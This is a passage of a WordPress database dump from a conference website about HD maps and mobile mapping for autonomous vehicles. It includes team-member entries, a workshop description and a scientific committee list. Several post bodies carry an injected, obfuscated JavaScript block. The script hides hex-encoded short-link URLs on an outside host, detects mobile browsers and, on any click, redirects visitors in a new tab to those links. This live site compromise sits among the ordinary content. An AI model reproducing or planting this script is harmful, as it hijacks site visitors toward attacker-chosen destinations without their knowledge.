)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Filiberto Chiabrando</strong>','','publish','closed','closed','','filiberto-chiabrando','','','2022-10-09 05:46:31','2022-10-09 05:46:31','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2547',0,'dt_team','',0),
(2548,1,'2022-10-07 19:08:42','2022-10-07 19:08:42','','2','','inherit','open','closed','','2-8','','','2022-10-07 19:08:42','2022-10-07 19:08:42','',2547,'https://gsw2023.com/wp-content/uploads/2022/10/2-7.jpg',0,'attachment','image/jpeg',0),
(2549,1,'2022-10-07 19:09:29','2022-10-07 19:09:29','<!-- wp:paragraph -->\n<p>National Land Survey of Finland Finland</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Honkavaara Eija</strong>','','publish','closed','closed','','honkavaara-eija','','','2022-10-09 05:46:44','2022-10-09 05:46:44','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2549',0,'dt_team','',0),
(2550,1,'2022-10-07 19:09:21','2022-10-07 19:09:21','','3','','inherit','open','closed','','3-4','','','2022-10-07 19:09:21','2022-10-07 19:09:21','',2549,'https://gsw2023.com/wp-content/uploads/2022/10/3-3.jpg',0,'attachment','image/jpeg',0),
(2552,1,'2022-10-07 19:58:53','2022-10-07 19:58:53','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n 	<li>\n<h6><strong>Static HD maps automated production and update</strong></h6>\n</li>\n 	<li>\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\n</li>\n 	<li>\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\n</li>\n 	<li>\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\n</li>\n 	<li>\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\n</li>\n 	<li>\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\n</li>\n 	<li>\n<h6><strong>HD maps applications</strong></h6>\n</li>\n 	<li>\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\n</li>\n 	<li>\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\n</li>\n 	<li>\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\n</li>\n 	<li>\n<h6><strong>Multi-sensor calibration</strong></h6>\n</li>\n 	<li>\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\n</li>\n 	<li>\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\n</li>\n 	<li>\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\n</li>\n 	<li>\n<h6><strong>Point cloud processing</strong></h6>\n</li>\n 	<li>\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\n</li>\n 	<li>\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\n</li>\n 	<li>\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\n</li>\n 	<li>\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\n</li>\n 	<li>\n<h6><strong>Novel application cases</strong></h6>\n</li>\n</ul>\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\n<ul>\n 	<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n 	<li>\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\n</li>\n 	<li>\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\n</li>\n 	<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\n</li>\n 	<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\n</li>\n 	<li>\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\n</li>\n 	<li>\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\n</li>\n 	<li>\n<h6><strong>You Li, Wuhan University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\n</li>\n 	<li>\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\n</li>\n 	<li>\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\n</li>\n</ul>\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 